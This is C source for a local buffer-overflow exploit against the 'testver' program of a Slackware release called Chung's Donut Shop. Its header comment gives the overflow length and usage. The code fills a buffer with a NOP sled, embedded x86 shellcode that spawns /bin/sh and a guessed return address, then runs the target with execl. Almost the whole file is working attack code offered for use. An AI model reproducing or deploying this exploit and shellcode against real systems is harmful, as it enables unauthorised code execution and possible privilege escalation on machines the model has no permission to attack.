/*
	 Chung's Donut Shop Release
	 ==========================
	 www.vapid.org/dorian/chungs
	 For Linux Slackware 8.x
	 There's a buffer overflow in "testver"!! 
         If you pass an argument to testver longer than 4074 bytes
 	 It segfaults. Oops. That's plenty of room to insert shellcode.
              
	 This issue was found by d4y-j4y and this exploit was written
         by d4y-j4y. d4yj4y@yahoo.com
	 
         usage:
	 $ gcc testver_smash.c -o testver_smash
         $ ./testver_smash
	 $
	 Not setuid though!!!  ARgh!!
         	
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER                         4075 
#define OVERSIZE                       8 

// Ya, you know the shellcode that gives you a shell
char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp (void)
{
         __asm__("movl %esp, %eax");
}

int main ()
{
         char buffer [BUFFER+OVERSIZE+1];
         unsigned long sp;
         long addy;
         int offset = 8 ;
         int i;
         sp = get_sp ();
         offset = 300;
         addy = sp - offset;

       	 for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
             *(long*)&buffer[i] = addy;

         memset (buffer, 0x90, BUFFER-strlen(shellcode));
         memcpy (buffer + BUFFER - strlen (shellcode), shellcode,strlen(shellcode));
         buffer[BUFFER+OVERSIZE] = '\0';
         printf ("Chung\'s Donut Shop\ntestver smash by d4y-j4y...\n");
	 sleep(3);
         execl ("/usr/sbin/testver", "buffer", buffer, NULL);

         return 0;
}